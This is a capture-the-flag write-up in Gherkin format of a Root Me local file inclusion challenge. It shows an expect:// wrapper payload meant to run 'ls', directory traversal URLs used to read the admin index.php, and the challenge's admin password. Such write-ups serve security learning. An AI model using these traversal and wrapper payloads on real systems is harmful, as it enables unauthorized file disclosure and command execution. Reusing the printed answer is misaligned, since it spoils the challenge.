## Version 2.0
## language: en

Feature: Local File Inclusion-Root Me
  Site:
    www.root-me.org
  Category:
    Web-Server
  User:
    dianaosorio97
  Goal:
    Find the password

  Background:
  Hacker's software:
    | <Software name> | <Version>       |
    | Ubuntu          | 18.04.1 (64-bit)|
    | Gogle Chrome    | 71.03578.80     |
  Machine information:
    Given I am accessing the challenge page
    And I see the problem statement
    """
    Get in the admin section.
    """
    Then I selected the challenge button to start

  Scenario: Fail:Exploring directories
    Given I access the section to solve the challenge
    And I see the directories
    Then I use wrappers in all directories to see the files
    """
    http://challenge01.root-me.org/web-serveur/ch16/?page
    =expect://ls
    """
    Then I see that this technique does not work

  Scenario: Success:Back a directory
    Given I had already explored the directories
    Then I back a directory
    """
    http://challenge01.root-me.org/web-serveur/ch16/?files=../
    """
    And I see others files
    Then I entry to the admin section
    """
    http://challenge01.root-me.org/web-serveur/ch16/?files
    =../admin
    """
    And I see the file index.php
    Then I entered the directory
    """
    http://challenge01.root-me.org/web-serveur/ch16/?files
    =../admin&f=index.php
    """
    Then I read the index.php file to find login information
    And I see the next line
    """
    $ users = array ('admin' => 'OpbNJ60xYpvAQU8');
    """
    Then I use the password to log in as administrator
    And I I see the following message
    """
    You can use this password to validate the challenge!
    """
    Then I entered the password as an answer
    And I solve the challenge
